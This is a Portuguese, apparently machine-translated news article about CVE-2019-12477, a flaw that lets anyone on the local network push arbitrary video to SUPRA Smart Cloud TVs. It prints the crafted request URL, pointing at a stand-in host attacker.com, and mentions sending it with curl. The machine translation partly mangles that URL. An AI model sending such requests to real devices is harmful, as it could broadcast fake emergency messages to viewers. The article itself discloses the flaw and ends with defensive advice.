Casa > cibernético Notícias > CVE-2019-12477: Vulnerabilidade no Supra Smart TV Nuvem
CYBER NEWS

CVE-2019-12477: Vulnerabilidade no Supra Smart TV Nuvem

O pesquisador de segurança Dhiraj Mishra apenas descobriu uma vulnerabilidade de segurança, CVE-2019-12477, na marca SUPRA inteligente TV.

Pelo visto, Supra inteligente Nuvem TV permite a inclusão de arquivo remoto na função openLiveURL, que pode permitir que um invasor local transmita um vídeo falso sem qualquer autenticação usando / remote / media_control?ação = conjuntos&uri = URI.




Mais sobre CVE-2019-12477

SUPRA é uma empresa russa que fabrica equipamentos de áudio e vídeo, eletrodomésticos e eletrônicos automotivos. A maior parte da tecnologia está sendo distribuída por meio de sites de comércio eletrônico na Rússia, China, e Emirados Árabes Unidos.

Em seu relatório, o pesquisador compartilhada que ele explorou com sucesso `openLiveURL()`que permite a um atacante local transmitir vídeo na TV em nuvem supra smart. “Eu encontrei essa vulnerabilidade inicialmente pela revisão do código-fonte e, em seguida, rastrear o aplicativo e ler cada solicitação me ajudou a acionar esta vulnerabilidade,”Mishra disse.

relacionado: [wplinkpreview url =”https://sensorstechforum.com/smart-homes-at-risk-to-hackers/”] 40% de casas inteligentes Atualmente Vulnerável a Hacking.

Para acionar a vulnerabilidade, um invasor teria apenas que enviar uma solicitação especialmente criada para o seguinte URL:

https://192.168.1.155/remoto / media_control?ação = conjuntos&uri = https://attacker.com/fake_broadcast_message.m3u8.

Embora o URL de referência acima leve (.M3U8) vídeo baseado em formato. Podemos usar `curl -v -X GET` para enviar tal pedido, normalmente, esta é uma inclusão de arquivo remoto não autenticado. Um invasor pode transmitir qualquer vídeo sem qualquer autenticação, o pior invasor pode aproveitar esta vulnerabilidade para transmitir uma falsa mensagem de emergência (Assustador certo?).

O problema aqui é que a vulnerabilidade permanece sem correção e é altamente provável que continue assim. O pesquisador não encontrou nenhuma maneira de entrar em contato com o fornecedor para relatar suas descobertas. Há também um vídeo de prova de conceito revelando a exploração bem-sucedida. O vídeo mostra como um discurso de Steve Jobs é repentinamente substituído por um falso “Mensagem de Alerta de Emergência”.

A vulnerabilidade foi atribuída a um CVE ID, CVE-2019-12477, mas não há informações se algum dia serão endereços. assim, o que os proprietários de SUPRA Smart Cloud TVs podem fazer? A resposta curta é manter a rede sem fio o mais segura possível usando uma senha forte e um firewall para todos os dispositivos inteligentes. Porque, como somos provados todos os dias, casas inteligentes não são tão inteligentes assim.

relacionado: [wplinkpreview url =”https://sensorstechforum.com/misconfigured-mqtt-protocol-risks-smart-homes/”] Protocolo MQTT mal configurado coloca milhares de casas inteligentes em risco.

Um ótimo exemplo de como é fácil hackear uma casa inteligente vem de pesquisadores do Avast. Último agosto, eles alertaram sobre o protocolo MQTT (Transporte de telemetria de enfileiramento de mensagens) qual, se mal configurado, poderia dar aos hackers acesso completo a uma casa inteligente. Como resultado dessa brecha de segurança, a casa pode ser manipulada de várias maneiras, incluindo seus sistemas de entretenimento e voz, vários aparelhos domésticos, e portas inteligentes.

Milena Dimitrova

Um escritor inspirado e gerente de conteúdo que está com SensorsTechForum desde o início do projeto. Um profissional com 10+ anos de experiência na criação de conteúdo envolvente. Focada na privacidade do usuário e desenvolvimento de malware, ela acredita fortemente em um mundo onde a segurança cibernética desempenha um papel central. Se o senso comum não faz sentido, ela vai estar lá para tomar notas. Essas notas podem mais tarde se transformar em artigos! Siga Milena @Milenyim

mais Posts

Me siga:
Twitter

Deixe um comentário

seu endereço de e-mail não será publicado. Campos obrigatórios são marcados *

This website uses cookies to improve user experience. By using our website you consent to all cookies in accordance with our Política de Privacidade.
Concordo